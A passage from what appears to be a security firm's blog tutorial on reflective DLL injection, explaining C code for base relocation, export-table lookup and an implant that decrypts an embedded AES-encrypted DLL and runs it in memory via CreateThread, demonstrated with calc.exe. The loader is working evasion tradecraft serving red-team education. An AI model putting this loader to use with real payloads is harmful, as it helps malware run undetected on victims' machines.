                // perform the relocation, skipping IMAGE_REL_BASED_ABSOLUTE as required.
                // we dont use a switch statement to avoid the compiler building a jump table
                // which would not be very position independent!
                if (((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_DIR64)
                    *(ULONG_PTR*)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += uiLibraryAddress;
                else if (((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_HIGHLOW)
                    *(DWORD*)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += (DWORD)uiLibraryAddress;
                                    else if (((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_HIGH)
                    *(WORD*)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += HIWORD(uiLibraryAddress);
                else if (((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_LOW)
                    *(WORD*)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += LOWORD(uiLibraryAddress);
                // get the next entry in the current relocation block
                uiValueD += sizeof(IMAGE_RELOC);
            }
            // get the next entry in the relocation directory
            uiValueC = uiValueC + ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock;
        }
    }


The operation we perform first, is obtaining the delta (difference) between the image base address that is listed in the Optional Header and the starting address of our allocated memory. As an example, you can picture it like this: Image Base Listed = 180000000 | Address of Allocated Memory Region = 0x26d35a40000 | the Delta would be 0x26BB5A40000. This delta value is saved in the uiLibraryAddress variable. Then we obtain a pointer to the relocation table entry in the data directory and save it in uiValueB. We follow that up with a quick sanity check to ensure that the relocation table has a size parameter. If it is zero, then the table is supposed to be empty. Next, we set our uiValueC variable to the beginning address of the image base relocation table. After our uiValueC variable points to the tables' data, we enter our while loop that will continue until our SizeOfBlock parameter, which is 28, reaches 0. Then we make the uiValueA variable equal to the virtual address of the entry points and add our base address to that. This gives us a pointer to the data from the screenshot below.


After we reach a pointer to our data table, we decrement our counter, 28, by (8/4) or 2. How did we get 8 bytes divided by 4 bytes? If we look at the WinNT.h file and search for IMAGE_BASE_RELOCATION structure, we see that both variables within that structure are the size of DWORD or 4 bytes. Then we look for IMAGE_RELOC in our ReflectiveLoader.h file to see two variables the size of a WORD or 2 bytes each. Why do we decrement by 2 bytes? If you look at the Relocation Block the values are each two bytes long and the last two are not needed, therefore you have 14 entries.

After we decrement our counter, we increase our pointer to the relocation block data by 8. The reason is that the first 8 bytes store the RVA, and the block size value, the incremented value is stored in uiValueD. We then set our counter (26 now after the decrement) to uiValueB which will bring us into our while loop. Once in the while loop, we check the first relocation entry's architecture type, to see if it’s x86 or x64. If x64, it will require larger addresses. Once the type has been determined we take the uiValueA and add the Relocation RVA to it, which gives us the first function address. Next, we take that function address value and then add the delta that is saved in uiLibraryAddress. This successfully performs a relocation address patch. Since the address that is saved for the relocation entry is for the image base of 18000000, and our allocated memory is at 0x26d35a40000, we need to add the value that is stored there by the delta 0x26BB5A40000 so that it will fit in our allocated memory region.


That means we take the value stored in the first entry, 00000001800021c0 + add the delta 0x26BB5A40000 = and we receive the patched relocation 0x26D35A421C0. If you look at our library’s' allocated memory address 0x26D35A40000 our relocation is located 21C0 bytes afterward! After the patching is completed, we increment our relocation entry to the next one. Then we decrement our counter until we break the inner while loop. Finally, we increment our block to the next block if it exists and restart the process for that block. However, our malicious DLL only has 1 block therefore we exit.

Finally, after all our hard work, we can obtain the address that needs to be returned to the executing program. This process is simple and looks like the following:

    // STEP 6: call our images entry point
    // uiValueA = the VA of our newly loaded DLL/EXE's entry point
    uiValueA = (uiBaseAddress + ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.AddressOfEntryPoint);
    // We must flush the instruction cache to avoid stale code being used which was updated by our relocation processing.
    pNtFlushInstructionCache((HANDLE)-1, NULL, 0);
    // call our respective entry point, fudging our hInstance value
#ifdef REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
    // if we are injecting a DLL via LoadRemoteLibraryR we call DllMain and pass in our parameter (via the DllMain lpReserved parameter)
    ((DLLMAIN)uiValueA)((HINSTANCE)uiBaseAddress, DLL_PROCESS_ATTACH, lpParameter);
#else
    // if we are injecting an DLL via a stub we call DllMain with no parameter
    ((DLLMAIN)uiValueA)((HINSTANCE)uiBaseAddress, DLL_PROCESS_ATTACH, NULL);
#endif
    // STEP 8: return our new entry point address so whatever called us can call DllMain() if needed.
    return uiValueA;
}


We find the execution address of the DLL by accessing the OptionalHeaders' Entry Point Address RVA variable and adding our allocated memory regions' base address and storing it in uiValueA. The pNtFlushInstructionCache function pointer we resolved at the beginning of ReflectiveLoader does exactly as it sounds and flushes the instruction cache. Next, we typecast our entry point address for the DLL by typecasting it as a DLLMAIN type and passing it a few arguments, the first is the base address of the memory region, the next is the reason in our case its DLL Process Attach, and the third would be whatever parameters we want to pass to DLL Main "from the command line". If you're unsure of what this looks like, please reference the following screenshot:


This value is then returned to the calling program.

This brings us to our implant that will store our DLL in an encrypted format on disk, decrypt our DLL, allocate memory for the decrypted version (this will mimic the version stored on disk), then we find the address of the ReflectiveLoader exported function, and call it. Once the ReflectiveLoader exported function is called, it again allocates memory in the current process for the size of the image in memory (taken from the optional headers) performs all the patching and loading we stepped through earlier and then returns the address of the entry point to our implant program. With this entry point address, all we must do is call CreateRemoteThread. So, what does this look like?

We'll start by explaining the easiest function, the main block:

int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) {
    void* exec_mem;
    BOOL rv;
    HANDLE th;
    DWORD oldprotect = 0;
    DWORD RefLdrOffset = 0;
    unsigned int payload_len = sizeof(payload);
    // Allocate memory for payload
    exec_mem = VirtualAlloc(0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    // Decrypt payload
    AESDecrypt((char*)payload, payload_len, (char*)key, sizeof(key));
    // Copy payload to allocated buffer
    RtlMoveMemory(exec_mem, payload, payload_len);
    // Make the buffer executable
    rv = VirtualProtect(exec_mem, payload_len, PAGE_EXECUTE_READ, &oldprotect);
    RefLdrOffset = GetReflectiveLoaderOffset(payload);
    // If all good, launch the payload
    if (rv != 0) {
        th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE)((ULONG_PTR)exec_mem + RefLdrOffset), 0, 0, 0);
        Sleep(5000); // give ReflectiveLoader time to perform the parsing and loading the DLL into memory.
        WaitForSingleObject(th, INFINITE);
    }
}


First, we allocate memory in our current process for the size of the payload we have stored in our code. Next, we decrypt the payload and then move the payload into our allocated memory region. Following that we change the memory regions protections to executable. Finally, we call our GetReflectiveLoaderOffset function and give it the decrypted payload as a parameter. This function should seem vaguely familiar as all we are doing at its core is parsing the headers of the library, finding the export address table, and then finding the address of our ReflectiveLoader function.

DWORD GetReflectiveLoaderOffset(VOID* lpReflectiveDllBuffer)
{
    UINT_PTR uiBaseAddress = 0;
    UINT_PTR uiExportDir = 0;
    UINT_PTR uiNameArray = 0;
    UINT_PTR uiAddressArray = 0;
    UINT_PTR uiNameOrdinals = 0;
    DWORD dwCounter = 0;
#ifdef WIN_X64
DWORD dwCompiledArch = 2;
#else
// This will catch Win32 and WinRT.
DWORD dwCompiledArch = 1;
#endif
uiBaseAddress = (UINT_PTR)lpReflectiveDllBuffer;
// get the File Offset of the modules NT Header
uiExportDir = uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew;
// currenlty we can only process a PE file which is the same type as the one this fuction has  
// been compiled as, due to various offset in the PE structures being defined at compile time.
if (((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.Magic == 0x010B) // PE32
{
    if (dwCompiledArch != 1)
        return 0;
}
else if (((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.Magic == 0x020B) // PE64
{
    if (dwCompiledArch != 2)
        return 0;
}
else
{
    return 0;
}
// uiNameArray = the address of the modules export directory entry
uiNameArray = (UINT_PTR) & ((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT];
// get the File Offset of the export directory
uiExportDir = uiBaseAddress + Rva2Offset(((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress, uiBaseAddress);
// get the File Offset for the array of name pointers
uiNameArray = uiBaseAddress + Rva2Offset(((PIMAGE_EXPORT_DIRECTORY)uiExportDir)->AddressOfNames, uiBaseAddress);
// get the File Offset for the array of addresses
uiAddressArray = uiBaseAddress + Rva2Offset(((PIMAGE_EXPORT_DIRECTORY)uiExportDir)->AddressOfFunctions, uiBaseAddress);
// get the File Offset for the array of name ordinals
uiNameOrdinals = uiBaseAddress + Rva2Offset(((PIMAGE_EXPORT_DIRECTORY)uiExportDir)->AddressOfNameOrdinals, uiBaseAddress);
// get a counter for the number of exported functions...
dwCounter = ((PIMAGE_EXPORT_DIRECTORY)uiExportDir)->NumberOfNames;
// loop through all the exported functions to find the ReflectiveLoader
while (dwCounter--)
{
    char* cpExportedFunctionName = (char*)(uiBaseAddress + Rva2Offset(DEREF_32(uiNameArray), uiBaseAddress));
    if (strstr(cpExportedFunctionName, REFLDR_NAME) != NULL)
    {
        // get the File Offset for the array of addresses
        uiAddressArray = uiBaseAddress + Rva2Offset(((PIMAGE_EXPORT_DIRECTORY)uiExportDir)->AddressOfFunctions, uiBaseAddress);
        // use the functions name ordinal as an index into the array of name pointers
        uiAddressArray += (DEREF_16(uiNameOrdinals) * sizeof(DWORD));
        // return the File Offset to the ReflectiveLoader() functions code...
        return Rva2Offset(DEREF_32(uiAddressArray), uiBaseAddress);
    }
    // get the next exported function name
    uiNameArray += sizeof(DWORD);
    // get the next exported function name ordinal
    uiNameOrdinals += sizeof(WORD);
}
return 0;
}


We start by initializing some variables and then setting our payload buffer base address to the uiBaseAddress variable. Next, we find the NTHeaders address by adding the offset in the e_lfanew variable. Then we do a sanity check to determine our architecture (32 or 64 bit). Then we move into the good stuff. The first item is to set the uiNameArray variable equal to the entry of the Export Directory in the Data Directory table. Next, we use the export directory entry's virtual address and the base address of the payload and pass them to the Rva2Offset function. To explain that function simply, it takes the virtual address given, finds which section the address resides in, then takes the virtual address of that section and the raw data pointer to that section, combines the two values, and subtracts the virtual address we passed by that value. This means if the virtual address passed is within the .text section of our DLL, we would take the virtual address and subtract it by 0x1000 + 0x400 or 0x1400. This will give us the offset of the data we're looking for as it is on disk (since we have not loaded this DLL into memory correctly like we would using ReflectiveLoader). Then we add that offset to the base address of our payload to find the value that we store in uiExportDir. We repeat this process for the array of names, addresses, and ordinals, for the export directory. Luckily our DLL only exports one function which is ReflectiveLoader.

Here are the section headers in case you'd like a reference to how we got our numbers.


Then we initiate a counter variable that is equal to the number of names, which in this case is one. Following that we obtain a pointer to the name of the first exported function by the DLL by again finding the offset to the data as it is on disk, adding the base address of our payload to it, typecasting it to a character pointer, and saving it as the cpExportedFunctionName. We then compare the character pointer using the strstr function, to check to see if the name matches our REFLDR_NAME definition. If it doesn’t, we move to the next name and increase the ordinal. However, if it matches, we obtain a pointer to the array of addresses. Then we multiply our ordinal by 4 to skip over the desired function’s virtual address and find the functions' name virtual address. Then we return the offset of that function name.


Back in main with our offset value saved in RefLdrOffset.

RefLdrOffset = GetReflectiveLoaderOffset(payload);
    // If all good, launch the payload
    if (rv != 0) {
        th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE)((ULONG_PTR)exec_mem + RefLdrOffset), 0, 0, 0);
        Sleep(5000); // give ReflectiveLoader time to perform the parsing and loading the DLL into memory.
        WaitForSingleObject(th, INFINITE);
    }


To finish up our program, all we need to do is call CreateThread with our allocated memories base address and the loader offset. We sleep for a few seconds to give the ReflectiveLoader function time to do its job and then call WaitForSingleObject will force the computer to run our payload until it finishes executing or receives the shutdown signal.

To recap our execution flow looks like the following:

Implant with our encrypted DLL -> allocates memory for the DLL -> put the decrypted DLL into that memory space -> find the offset of the exported ReflectiveLoader function in the DLL -> call the ReflectiveLoader function -> ReflectiveLoader searches backward for the start of the DLL in memory -> allocates a new memory region that is the size of the DLL Image in memory (which is larger than on disk) -> perform loading and patching operations -> call DllMain of the DLL now that it's been loaded -> DllMain calls our Go function -> go function decrypts our calc.exe payload and executes it!

Compiling and Preparing the Implant

To compile our implant, we need to first compile our DLL. The Visual Studio solution I have put on GitHub has all the code ready for compilation. Once you have compiled everything, we need to encrypt our DLL using the aes.py python script. This script will output the DLL in an encrypted format along with the key used to decrypt the DLL. Usage looks just like the following:


When we put our DLL in our program it will look like the following, we just need to ensure its a variable initialized outside of main.


When we execute our ReflectiveLoader program it works just as planned!


All code was developed by the Sektor7 Institute team and Stephen Fewer. If you have any questions or would like to check out more of my work you can follow me here on Twitter or on LinkedIn. If you're interested in hiring Depth Security for our Penetration Testing services, please visit our contact page or email sales@depthsecurity.com.

Have Questions?
Get Answers